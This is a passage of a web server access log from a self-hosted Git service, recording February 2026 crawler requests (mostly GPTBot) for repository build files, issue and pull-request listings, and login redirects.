compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:40:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" +[17/Feb/2026:19:40:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13749] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" +[17/Feb/2026:19:40:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11165] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" +[17/Feb/2026:19:40:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 12797] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" +[17/Feb/2026:19:40:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10182] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:40:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:40:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:40:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:40:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 11168] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PKG-00.toc" +[17/Feb/2026:19:40:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 11169] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/EXE-00.toc" +[17/Feb/2026:19:40:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 11167] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.toc" +[17/Feb/2026:19:40:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 11767] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:19:40:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out?display=rendered" [Client 74.7.227.38] [Length 11287] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" +[17/Feb/2026:19:40:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=recentupdate&state=closed&type=all" +[17/Feb/2026:19:40:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=nearduedate&state=closed&type=all" +[17/Feb/2026:19:41:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:41:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:19:41:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:41:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:41:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:41:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9997] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:41:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:41:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12372] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:19:41:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:19:41:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:19:41:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:19:41:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:19:41:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.make" [Client 74.7.227.38] [Length 11530] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:19:41:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11587] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:19:41:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11934] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:19:41:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:19:41:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:19:41:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 11857] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:19:41:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 16268] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:19:41:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 11542] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:19:41:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 11510] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:19:41:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 1035] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:19:41:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 1065] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:19:41:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12345] [Gzip 5.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:19:41:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9915] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:19:41:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10617] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:19:41:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:19:41:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:19:41:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 116] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:19:41:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 9911] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:19:41:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" [Client 74.7.227.38] [Length 9908] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:19:41:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 10560] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:19:41:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" [Client 74.7.227.38] [Length 9913] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" +[17/Feb/2026:19:41:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" [Client 74.7.227.38] [Length 1053] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:19:41:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 1069] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:19:41:16 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:19:41:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:19:41:16 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/robots.txt" [Client 74.7.175.175] [Length 19] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[17/Feb/2026:19:41:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11379] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:19:41:17 +0000] - 303 303 - GET https git.hanmocnn.co.kr 